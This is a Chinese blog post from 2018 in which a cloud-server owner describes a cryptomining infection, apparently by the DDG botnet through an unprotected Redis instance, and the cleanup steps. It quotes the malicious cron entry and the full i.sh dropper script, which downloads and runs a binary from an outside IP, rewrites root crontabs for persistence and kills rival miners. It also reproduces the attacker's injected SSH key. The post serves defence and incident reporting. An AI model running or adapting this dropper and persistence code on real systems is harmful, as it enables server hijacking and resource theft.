最近在阿里云老发消息说存在安全隐患(罪魁祸首-挖矿病毒)

 

最近在阿里云老发消息说存在安全隐患(罪魁祸首-挖矿病毒)

一年前租的阿里云服务器(乞丐版),之前一直发消息是存在隐患啥的,我寻思一个做实验的机器,无所谓了,本来就挺卡,玩个tomcat ,单机redis勉强玩玩,最近阿里云一直发提醒有点频繁,也是最近研究redis定时备份数据,需要写一些 crontab 脚本命令,就执行了一条命令:

crontab -e

结果:

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

TMD这是什么鬼,定是不祥之物 赶紧用命令行看看

[root@iz2zecm4ndtkaue32tynx5z ~]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014
if [ ! -f "/tmp/ddgs.3014" ]; then
    
    curl -fsSL http://149.56.106.215:8000/static/3014/ddgs.$(uname -m) -o /tmp/ddgs.3014
fi
chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

[root@iz2zecm4ndtkaue32tynx5z ~]# 

 ddgs.i686 还会在失陷主机本地的 /var/spool/cron/crontabs/root 或者 /var/spool/cron/crontabs 处写入定时任务脚本,从云端下载最新的 i.sh 脚本定时执行( %s 处为最新的 i.sh 下载链接),实现持久驻留:然后,ddgs.i686 会尝试在当前肉鸡的 ~/.ssh/authorized_keys 中注入以下 SSH Pub Key

这不是扯犊子了么,有了公钥这不是能免密登陆了,这回真成了肉鸡了:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfxLBb/eKbi0TVVULI8ILVtbv2iaGM+eZbZoCWcD3v/eF1B/VkHAC1YwIhfqkUYudwhxVfQzsOZYQmKyapWzgp3tBAxcl82Al++VQc36mf/XFnECHndJS1JZB429/w/Ao+KlASl/qzita61D2VsXyejIQIeYR7Ro+ztLSTXjx+70CvzgOae3oayunL/hGX8qORIkG5YR3R1Jefhxy1NhGxEd6GaR7fZA5QWGfM17IcSXi2Q876JL8U7Aq8cjQyN/kGT2jWiiQiOZzqbjVJVICiwk0KvtrTwppV6FLty/vdfhgyspR4WZMep41xxuBH5rBkEJO5lqbKJWatcaA8n9jR root@localhost                                                      

 cpu都97%了,他大爷的,我说最近搭建集群都起不来应用呢,搁这猫着呢

 

 kill -9 28513                                                                                 
 kill -9 10818

 

 

诡异的现象 -- 服务器的性能依旧被耗尽,同时cpu和内存几乎爆满,查找了相应的资料进行如下操作:
(1)关闭访问挖矿服务器的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP 和iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP 

(2)取消掉执行权限chmod -x minerd ,
(2)删除/usr/local/etc 下root文件中的内容 
(3)删除yam 文件(我的yam文件不是在上面说的/opt目录下的,使用find命令查找,然后删除)
(4)删除 /root/.ssh/KHK75NEOiq 
(5)删除/opt/minerd 和 /opt/KHK75NEOiq33 
(6)杀死minerd进程,pkill minerd 或者kill -9 进程Id

删除 /tmp 目录下的文件

 

[root@iZ2zeayj54m6qs0689jm ~]# cd /tmp/ 
[root@iZ2zeayj54m6qs0689jm tmp]# ls
Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> duckduckgo.23.log hsperfdata_root wnTKYg ddg.1001 dump.rdb qtsingleapp-aegisG-46d2
[root@iZ2zeayj54m6qs0689jm tmp]# rm -rf ./*
[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/ KHK75NEOiq33 minerd rh/
[root@iZ2zeayj54m6qs0689jm tmp]# cd /opt/
[root@iZ2zeayj54m6qs0689jm opt]# ls KHK75NEOiq33 minerd rh
[root@iZ2zeayj54m6qs0689jm opt]# rm -rf ./*

 

删除定时任务 crontab -e的内容

 

结论:

这样的病毒是直接远程连接redis,一般redis都是root安装的,连接redis也就掌握了root权限,它可以往你的定时任务里写内容。
中这样的病毒大多都是因为redis没有设置密码,存在着很大的安全漏洞,所以大家要设置redis密码,并且更改redis的端口。
wnTKYg是门罗币,所以大家要注意服务器的安全,别让自己的资源让别人用来挣钱。

 

补充:病毒升级了(chmod 777 thisxxs 设置权限不好用了,改用这种方式chattr -R -i thisxxs

[root@iz2zecm4ndtkaue32tynx5z tmp]# ll
total 2720
-rwxr-xr-x 1 root root 2783552 Nov 22 03:54 qW3xT.4
-rw-rw-rw- 1 root root       0 Nov  6 11:31 thisxxs
[root@iz2zecm4ndtkaue32tynx5z tmp]# rm -rf *
rm: cannot remove ‘thisxxs’: Operation not permitted
[root@iz2zecm4ndtkaue32tynx5z tmp]# chmod 777 thisxxs
chmod: changing permissions of ‘thisxxs’: Operation not permitted
[root@iz2zecm4ndtkaue32tynx5z tmp]# ^C
[root@iz2zecm4ndtkaue32tynx5z tmp]# chmod -R u+w thisxxs
chmod: changing permissions of ‘thisxxs’: Operation not permitted
[root@iz2zecm4ndtkaue32tynx5z tmp]# chattr -R -i thisxxs
[root@iz2zecm4ndtkaue32tynx5z tmp]# rm -rf thisxxs
[root@iz2zecm4ndtkaue32tynx5z tmp]# rm -rf *

 

 

又再次升级了,闲来无事想学习一下大数据,又他娘的中毒了

新型病毒又出来了~~~

疑似国内来源的“8220挖矿团伙”追踪溯源分析

 

 

 不得不服,黑客还是专业~~~

 

配置文件使用过的名称:

l  w.conf、dd1.conf、gg1.conf、test.conf、tes.conf、hh1.conf

kkk1.confttt1.conf、ooo1.conf、ppp1.conf

 

挖矿程序使用过的名称:

l  nginx、suppoie、java、mysql、cpu.c、ntpd、psping、java-c、pscf、

l  cryptonight、sustes、xmr-stak、ririg、ntp、qqaa、ubyx

l  logo4.jpg、logo0.jpg、logo9.jpg

apaqidajiba、look、orgfs、crant、jvs、javs

 

 

检测及清理疑似中招的服务器:

  1. 使用top查看进程,KILL掉异常进程

  2. 检查/var/tmp目录,删除java、pscf3、w.conf等异常文件

  3. 检查crontab任务列表,删除异常任务

  4. 检查YARN日志,删除异常的Application ID

  5. 开启Hadoop Kerberos认证服务

 

个别删除不了的文件还是需要执行一下 chattr -R -i 文件,虽然执行之后和修改之前的权限好像没什么变化,但是执行之后就可以删除了。

 

CDH安装之篇四:启用Kerberos认证

 

详细信息参见:

DDG挖矿僵尸网络瞄准数据库服务器:收益已达近800万

清除wnTKYg 这个挖矿工木马的过程讲述

服务器挖矿又出新服务 wnTKYg

minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%

如何应对和预防"挖矿机"入侵?

 

posted @ 2018-11-20 21:22  神码是浮云  阅读(1349)  评论(1编辑  收藏  举报